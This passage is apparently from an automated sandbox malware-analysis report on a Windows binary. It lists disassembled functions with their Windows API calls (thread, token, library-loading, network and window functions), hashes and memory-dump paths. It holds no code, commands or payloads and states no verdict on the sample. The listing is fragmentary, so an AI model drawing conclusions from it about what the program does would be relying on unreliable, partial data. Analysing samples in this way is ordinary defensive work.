                • Instruction ID: a6074ec365f34c70a0aacf2ab61e99403dd825153351d5859f9b2fa9e96e02f7
                • Opcode Fuzzy Hash: 534408f6ead0063f5e8ca86064f9e9277ed8c09d1af500d3baa93e45d60e5340
                • Instruction Fuzzy Hash: C6112B76A04254BBC7019FE8AC45A9F7FFDAB45320F148255F819D7691D770CD4087A0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateThread.KERNEL32(00000000,?,0013CFF9,00000000,00000004,00000000), ref: 0013D218
                • GetLastError.KERNEL32 ref: 0013D224
                • __dosmaperr.LIBCMT ref: 0013D22B
                • ResumeThread.KERNEL32(00000000), ref: 0013D249
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Thread$CreateErrorLastResume__dosmaperr
                • String ID:
                • API String ID: 173952441-0
                • Opcode ID: ad1b3673ed51f50614f62d5c7939103c22e71f58c4ee5f3c7374a66c0bdd06fc
                • Instruction ID: 7e1f8a602345248c81447e91dcc7f2b187235de8bb0165a6ed9b19f96eef4c25
                • Opcode Fuzzy Hash: ad1b3673ed51f50614f62d5c7939103c22e71f58c4ee5f3c7374a66c0bdd06fc
                • Instruction Fuzzy Hash: AC01B536805204BBDB215BA5FC09BAF7A6DEF92731F104219F925961D0DF71C945C7E0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0011604C
                • GetStockObject.GDI32(00000011), ref: 00116060
                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0011606A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateMessageObjectSendStockWindow
                • String ID:
                • API String ID: 3970641297-0
                • Opcode ID: 8b570fdf337d094e40930fcf3bf18193f970394df34e2ed2a161592e241c4e12
                • Instruction ID: f8a0de403b1b915c5e4b2764abfd2e68d2b0cdc417f4ce1ff54532d1b3d12b67
                • Opcode Fuzzy Hash: 8b570fdf337d094e40930fcf3bf18193f970394df34e2ed2a161592e241c4e12
                • Instruction Fuzzy Hash: 93116D72501548BFEF168FA49C44EEABBA9EF1D3A4F050225FA1456110D7369CE0DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___BuildCatchObject.LIBVCRUNTIME ref: 00133B56
                  • Part of subcall function 00133AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00133AD2
                  • Part of subcall function 00133AA3: ___AdjustPointer.LIBCMT ref: 00133AED
                • _UnwindNestedFrames.LIBCMT ref: 00133B6B
                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00133B7C
                • CallCatchBlock.LIBVCRUNTIME ref: 00133BA4
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                • String ID:
                • API String ID: 737400349-0
                • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                • Instruction ID: 91ae3b79288af26b182d00447ed5b0d12740e1cf56770c10d1b2144ba44dc5f4
                • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                • Instruction Fuzzy Hash: BE010C32100149BBDF125E95CC46EEB7F6DEF58764F044014FE58A6121C736E961EBA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001113C6,00000000,00000000,?,0014301A,001113C6,00000000,00000000,00000000,?,0014328B,00000006,FlsSetValue), ref: 001430A5
                • GetLastError.KERNEL32(?,0014301A,001113C6,00000000,00000000,00000000,?,0014328B,00000006,FlsSetValue,001B2290,FlsSetValue,00000000,00000364,?,00142E46), ref: 001430B1
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0014301A,001113C6,00000000,00000000,00000000,?,0014328B,00000006,FlsSetValue,001B2290,FlsSetValue,00000000), ref: 001430BF
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 1bfea83f3cf52561bddc6a4c4201b424470e1150b3a912bc3deeb83052604e46
                • Instruction ID: 0030475b80ddb4d34d5f2b97ee03e2d8f646483786823ea783c1d7fb19ea636b
                • Opcode Fuzzy Hash: 1bfea83f3cf52561bddc6a4c4201b424470e1150b3a912bc3deeb83052604e46
                • Instruction Fuzzy Hash: 0201FE32701322EBCB314B799C45A577BD8EF46B71B210720F925E7660D721DD41C6E0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0017747F
                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00177497
                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001774AC
                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 001774CA
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Type$Register$FileLoadModuleNameUser
                • String ID:
                • API String ID: 1352324309-0
                • Opcode ID: a049ac539d760e64883085b918c533a43b0ffa4b021a3d54b5c3f1c14ee0ccc0
                • Instruction ID: 214ac871a751038080666c12cd4b0de041e3206be02f654178e228a0b71b5cb5
                • Opcode Fuzzy Hash: a049ac539d760e64883085b918c533a43b0ffa4b021a3d54b5c3f1c14ee0ccc0
                • Instruction Fuzzy Hash: F51180B5209315AFE7208F24DC09FA27FFCEB04B04F10C969A65BD6591D7B0E944DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0017ACD3,?,00008000), ref: 0017B0C4
                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0017ACD3,?,00008000), ref: 0017B0E9
                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0017ACD3,?,00008000), ref: 0017B0F3
                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0017ACD3,?,00008000), ref: 0017B126
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CounterPerformanceQuerySleep
                • String ID:
                • API String ID: 2875609808-0
                • Opcode ID: 043a3fed7b7268f08cf454c35b6e2d6a2ec32944a488ec373098ba58a2a8d3a1
                • Instruction ID: 56ccbc17683670979464419ff86fec1ec0a40715cc5425b77d4cf4c4cbb7f77a
                • Opcode Fuzzy Hash: 043a3fed7b7268f08cf454c35b6e2d6a2ec32944a488ec373098ba58a2a8d3a1
                • Instruction Fuzzy Hash: DB116171E0952DD7CF04AFE4E9A87EEBB78FF0A711F518085E945B2141CB305591CB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetWindowRect.USER32(?,?), ref: 001A7E33
                • ScreenToClient.USER32(?,?), ref: 001A7E4B
                • ScreenToClient.USER32(?,?), ref: 001A7E6F
                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 001A7E8A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClientRectScreen$InvalidateWindow
                • String ID:
                • API String ID: 357397906-0
                • Opcode ID: ef6286c9483443719ac63e49c2fe32e9ecf6ef1393c9f327a2ed1f48e3f8e209
                • Instruction ID: 40240bcdefed34e73d8092870491f58670991457dec4e929656d02f11a7c9006
                • Opcode Fuzzy Hash: ef6286c9483443719ac63e49c2fe32e9ecf6ef1393c9f327a2ed1f48e3f8e209
                • Instruction Fuzzy Hash: 281156B9D0024AAFDB41CFA8C8849EEBBF5FF19310F505056E915E3610D735AA94CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00172DC5
                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00172DD6
                • GetCurrentThreadId.KERNEL32 ref: 00172DDD
                • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00172DE4
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                • String ID:
                • API String ID: 2710830443-0
                • Opcode ID: c2f51a7cd597015b4f9aaef0403e2161946fa8a62dfaa5a9eb6fa87365df8f51
                • Instruction ID: 7b1209ab99bf8788fbba94a0ab17c766ff384accc80fa001cf69d1cedb9513ee
                • Opcode Fuzzy Hash: c2f51a7cd597015b4f9aaef0403e2161946fa8a62dfaa5a9eb6fa87365df8f51
                • Instruction Fuzzy Hash: 9AE0ED71601224BAD7245BA2DC0DEEB7E6CEB57BA1F404115F509D15909AA58981C6F0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00129639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00129693
                  • Part of subcall function 00129639: SelectObject.GDI32(?,00000000), ref: 001296A2
                  • Part of subcall function 00129639: BeginPath.GDI32(?), ref: 001296B9
                  • Part of subcall function 00129639: SelectObject.GDI32(?,00000000), ref: 001296E2
                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 001A8887
                • LineTo.GDI32(?,?,?), ref: 001A8894
                • EndPath.GDI32(?), ref: 001A88A4
                • StrokePath.GDI32(?), ref: 001A88B2
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                • String ID:
                • API String ID: 1539411459-0
                • Opcode ID: 13c2f351e09bda25f24a4091c9ae260672b59963f870d3c02e2b516e27b733e0
                • Instruction ID: ee17e6e5c7fd362f8d2c9cd1984de1056b826feb59588f4fae0c4b79818e55ca
                • Opcode Fuzzy Hash: 13c2f351e09bda25f24a4091c9ae260672b59963f870d3c02e2b516e27b733e0
                • Instruction Fuzzy Hash: E4F05E3A045258FADB125F94AD0DFCE3F59AF07310F448000FA11654E2CB7955A1CFE9
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSysColor.USER32(00000008), ref: 001298CC
                • SetTextColor.GDI32(?,?), ref: 001298D6
                • SetBkMode.GDI32(?,00000001), ref: 001298E9
                • GetStockObject.GDI32(00000005), ref: 001298F1
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Color$ModeObjectStockText
                • String ID:
                • API String ID: 4037423528-0
                • Opcode ID: f8819871123ad8b13d53adcf5b74001ad26443795f1b9a892ce9fc98c2298536
                • Instruction ID: 6c2e29f4eb5120b7b6c4555815e836e7a6f12548d129827388167df1066ca1c8
                • Opcode Fuzzy Hash: f8819871123ad8b13d53adcf5b74001ad26443795f1b9a892ce9fc98c2298536
                • Instruction Fuzzy Hash: 12E06D31344280EADB215B78BC0DBE83F61EB5333AF048219F6FA584E1C77246909B10
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentThread.KERNEL32 ref: 00171634
                • OpenThreadToken.ADVAPI32(00000000,?,?,?,001711D9), ref: 0017163B
                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001711D9), ref: 00171648
                • OpenProcessToken.ADVAPI32(00000000,?,?,?,001711D9), ref: 0017164F
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CurrentOpenProcessThreadToken
                • String ID:
                • API String ID: 3974789173-0
                • Opcode ID: 4ff39f708ebe65a9c93f1b0f0a640fd1a6783a775ae85d8c6d812caa67de397a
                • Instruction ID: 475c346de15ffebbd9e3dfb024f876253d9d40987fcef70f75cb1fec2b580998
                • Opcode Fuzzy Hash: 4ff39f708ebe65a9c93f1b0f0a640fd1a6783a775ae85d8c6d812caa67de397a
                • Instruction Fuzzy Hash: A4E08635601211EBD7201FB49E0DB473B7CAF56791F148808F245C9080D7744580C790
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetDesktopWindow.USER32 ref: 0016D858
                • GetDC.USER32(00000000), ref: 0016D862
                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0016D882
                • ReleaseDC.USER32(?), ref: 0016D8A3
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CapsDesktopDeviceReleaseWindow
                • String ID:
                • API String ID: 2889604237-0
                • Opcode ID: ddafb724391b1749419dc3c803ef6aa8a80b7b9c7854be349fc779521fedafa0
                • Instruction ID: 62aaef06de82f3b5fcec9a3cc0f2b85adf2fe8aa4ec7c3cac5afc5f6feaf8c6d
                • Opcode Fuzzy Hash: ddafb724391b1749419dc3c803ef6aa8a80b7b9c7854be349fc779521fedafa0
                • Instruction Fuzzy Hash: 68E01AB4800205DFCB459FB0E90C66DBBB5FB09310F118019F80AE7750CB388991AF80
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetDesktopWindow.USER32 ref: 0016D86C
                • GetDC.USER32(00000000), ref: 0016D876
                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0016D882
                • ReleaseDC.USER32(?), ref: 0016D8A3
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CapsDesktopDeviceReleaseWindow
                • String ID:
                • API String ID: 2889604237-0
                • Opcode ID: 7110f4ac2b596c6a22ef8d97317a1afe528fb8a8a76a7cf951db2dd0c62126ff
                • Instruction ID: a40d41c941a1733fb426669f8209a441d6baccc732f411517f131ead27bc42ea
                • Opcode Fuzzy Hash: 7110f4ac2b596c6a22ef8d97317a1afe528fb8a8a76a7cf951db2dd0c62126ff
                • Instruction Fuzzy Hash: D0E01A74800204DFCB419FB0D80866DBBB1BB08310B108008F80AE7750CB3899819F80
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00117620: _wcslen.LIBCMT ref: 00117625
                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00184ED4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Connection_wcslen
                • String ID: *$LPT
                • API String ID: 1725874428-3443410124
                • Opcode ID: f85e36f7d977511c86d224cce77498cce239b9e74f7877b944322b3f0d1ea6e6
                • Instruction ID: f016797c7d74213da8378e2b502662828f4c3dcbe3f06632964baad3c0cf6902
                • Opcode Fuzzy Hash: f85e36f7d977511c86d224cce77498cce239b9e74f7877b944322b3f0d1ea6e6
                • Instruction Fuzzy Hash: E3914E75A002059FCB14EF58C484EAABBF1AF45304F15809DE54A9F3A2DB35EE85CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID: #
                • API String ID: 0-1885708031
                • Opcode ID: 0355a87ea2f9d576841bc39f8e7272ad2d60cb6887b454ad2782e73d9423ab0b
                • Instruction ID: c0894f0475ce737f855c2d36bd601edadffdd342c0167f30a91a470c4e26594d
                • Opcode Fuzzy Hash: 0355a87ea2f9d576841bc39f8e7272ad2d60cb6887b454ad2782e73d9423ab0b
                • Instruction Fuzzy Hash: 90513339504256DFDF18DF68D881AFA7BE8EF26310F244115F8929B2C0D7349DA2CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Sleep.KERNEL32(00000000), ref: 0012F2A2
                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0012F2BB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: GlobalMemorySleepStatus
                • String ID: @
                • API String ID: 2783356886-2766056989
                • Opcode ID: 49b083894e039ee4c1a822e2628b48da0221220c7b3a3d87bc5e6897818efa23
                • Instruction ID: 7a430a06cbfaf95a9e9449f1e3465367583cbf11b503473b16c947fd31df6e35
                • Opcode Fuzzy Hash: 49b083894e039ee4c1a822e2628b48da0221220c7b3a3d87bc5e6897818efa23
                • Instruction Fuzzy Hash: D0514771408745ABD320AF14DC86BAFBBF8FF95300F81886DF1D941195EB3185A9CB66
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 001957E0
                • _wcslen.LIBCMT ref: 001957EC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: BuffCharUpper_wcslen
                • String ID: CALLARGARRAY
                • API String ID: 157775604-1150593374
                • Opcode ID: 2164c23bb2bbe4fee4dc6edeafe734e2fe6498ad0eb28b6996bab7d9396e051d
                • Instruction ID: 3f2baef85d2e2137b409ed1366d28166e189ddb56bf9f8717b93c95a6d90faaa
                • Opcode Fuzzy Hash: 2164c23bb2bbe4fee4dc6edeafe734e2fe6498ad0eb28b6996bab7d9396e051d
                • Instruction Fuzzy Hash: 01418E71A002099FCF15DFA9D8859EEBBF6FF69324F108069E505B7291E7309D81CB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _wcslen.LIBCMT ref: 0018D130
                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0018D13A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CrackInternet_wcslen
                • String ID: |
                • API String ID: 596671847-2343686810
                • Opcode ID: 7a213a75694daf718b9035d2f9b34f2369918947a0e4b6b91b69904ab1b8997c
                • Instruction ID: b564197b585e8c6427def5ccd2d3dd5cd37bab7ae98cceb81f14b97ddd5d7558
                • Opcode Fuzzy Hash: 7a213a75694daf718b9035d2f9b34f2369918947a0e4b6b91b69904ab1b8997c
                • Instruction Fuzzy Hash: 1F313D71D01209ABCF15EFA4DC85AEE7FB9FF18310F000169F815A6165EB31AA56CF50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DestroyWindow.USER32(?,?,?,?), ref: 001A3621
